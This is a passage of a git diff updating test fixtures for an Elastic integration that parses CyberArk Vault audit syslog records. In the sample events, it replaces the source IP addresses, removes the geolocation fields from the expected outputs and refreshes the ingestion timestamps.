\u003cMessage\u003eCPM Auto-detection Start\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:21:37\",\"IsoTimestamp\":\"2021-03-11T16:21:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"326\",\"Desc\":\"CPM Auto-detection Start\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Auto-detection Start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_info\",\"File\":\" \",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\" \",\"ExtraDetails\":\"ADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\",\"Message\":\"CPM Auto-detection Start\",\"GatewayStation\":\"\"}}}", "code": "326", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json index 79e6f6e7ef6..89ba47c48c9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json @@ -59,7 +59,7 @@ "event": { "severity": 2, "action": "cpm auto-detection end", - "ingested": "2021-06-09T10:24:33.441721800Z", + "ingested": "2021-12-09T13:36:57.215852200Z", "original": "\u003c5\u003e1 2021-03-11T16:21:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:21:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:21:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e327\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Auto-detection End\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Auto-detection End\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePasswordManager_info\u003c/Safe\u003e\\n \u003cFile\u003e \u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e \u003c/Reason\u003e\\n \u003cExtraDetails\u003eADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Auto-detection End\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:21:37\",\"IsoTimestamp\":\"2021-03-11T16:21:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"327\",\"Desc\":\"CPM Auto-detection End\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Auto-detection End\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_info\",\"File\":\" \",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\" \",\"ExtraDetails\":\"ADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\",\"Message\":\"CPM Auto-detection End\",\"GatewayStation\":\"\"}}}", "code": "327", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log index 16ec40c4f3c..99bf81c1f96 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log @@ -1,7 +1,7 @@ -<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 67.43.156.13\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json index 29a65f0335f..62613abab1e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -41,7 +29,7 @@ "PVWAAppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -50,7 +38,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:49Z", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "PVWAAppUsers", "message": "Update Owner", @@ -64,8 +52,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474073800Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:49\",\"IsoTimestamp\":\"2021-03-10T18:16:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329023500Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:49\",\"IsoTimestamp\":\"2021-03-10T18:16:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", @@ -92,20 +80,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -126,7 +102,7 @@ "PSMApp_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -135,7 +111,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:50Z", "safe": "PVWAConfig", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "PSMApp_VAGRANT", "message": "Update Owner", @@ -149,8 +125,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474089200Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:50\",\"IsoTimestamp\":\"2021-03-10T18:16:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329031900Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:50\",\"IsoTimestamp\":\"2021-03-10T18:16:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", @@ -177,20 +153,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -211,7 +175,7 @@ "PSMAppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -220,7 +184,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:51Z", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "PSMAppUsers", "message": "Update Owner", @@ -234,8 +198,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474092400Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329037500Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", @@ -262,20 +226,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -296,7 +248,7 @@ "PSMMaster" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -305,7 +257,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:51Z", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "PSMMaster", "message": "Update Owner", @@ -319,8 +271,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474095100Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329042900Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", @@ -347,20 +299,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -381,7 +321,7 @@ "Vault Admins" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -390,7 +330,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:53Z", "safe": "PSMUniversalConnectors", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "Vault Admins", "message": "Update Owner", @@ -404,8 +344,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474097700Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:53\",\"IsoTimestamp\":\"2021-03-10T18:16:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMUniversalConnectors\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329048300Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:53\",\"IsoTimestamp\":\"2021-03-10T18:16:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMUniversalConnectors\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", @@ -432,19 +372,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -465,7 +394,7 @@ "PVWAAppUsers" ], "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -474,7 +403,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:18Z", "safe": "PSM", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Update Owner", "source_user": "PVWAAppUsers", "message": "Update Owner", @@ -488,8 +417,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474100Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:18Z VAULT 